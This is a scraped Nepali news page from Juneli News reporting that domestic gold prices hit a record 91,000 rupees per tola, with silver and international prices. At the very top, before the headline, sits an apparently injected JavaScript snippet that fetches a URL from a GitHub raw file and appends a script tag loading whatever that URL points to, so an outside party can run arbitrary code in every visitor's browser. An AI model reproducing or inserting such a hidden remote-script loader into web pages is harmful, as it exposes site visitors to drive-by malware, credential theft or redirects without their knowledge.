;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सुनको मूल्य हालसम्मकै उच्च, प्रतितोला ९१ हजार पुग्यो – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सुनको मूल्य हालसम्मकै उच्च, प्रतितोला ९१ हजार पुग्यो
समाचार

सुनको मूल्य हालसम्मकै उच्च, प्रतितोला ९१ हजार पुग्यो

काठमाडौँ — घरेलु बजारमा सोमबार सुनको मूल्य प्रतितोला ९१ हजार रुपैयाँ पुगेको छ । यो हालसम्मकै उच्च हो । अघिल्लो दिनको तुलनामा प्रतितोलामा ४ सय रुपैयाँले बढेको हो ।

विश्वबजारमा सुनको मूल्य बढे पछि नेपाली बजारमा पनि आकासिएको नेपाल सुनचाँदी महासंघले जनाएको छ । सोमबार अन्तर्राष्ट्रिय बजारमा सुन प्रतिऔंस १ हजार ७ सय ५२.८० अमेरिकी डलर पुगेको छ ।

यस्तै, अघिल्लो दिनको तुलनामा चाँदीको मूल्यमा पनि प्रतितोला १० रुपैयाँले बढेर ९ सय ५० रुपैयाँ पुगेको छ । अन्तर्राष्ट्रिय बजारमा चाँदी प्रतिऔंस १७.८८ डलर पुगेको छ । मूल्य बढेपछि बजारमा सुनचाँदीको कारोबार लगभग ठप्प जस्तै भएको सुनचाँदी व्यवसायी महासंघका पूर्व अध्यक्ष तेजरत्न शाक्यले बताए ।

अन्तर्राष्ट्रिय वस्तु बजारमा सुनको मूल्य निकै उतारचढावपूर्ण रहेकाले आउँदा दिनमा स्वदेशी बजारमा अझै बढ्ने अनुमान गरिएको छ ।

फेसबुक प्रतिक्रियाहरु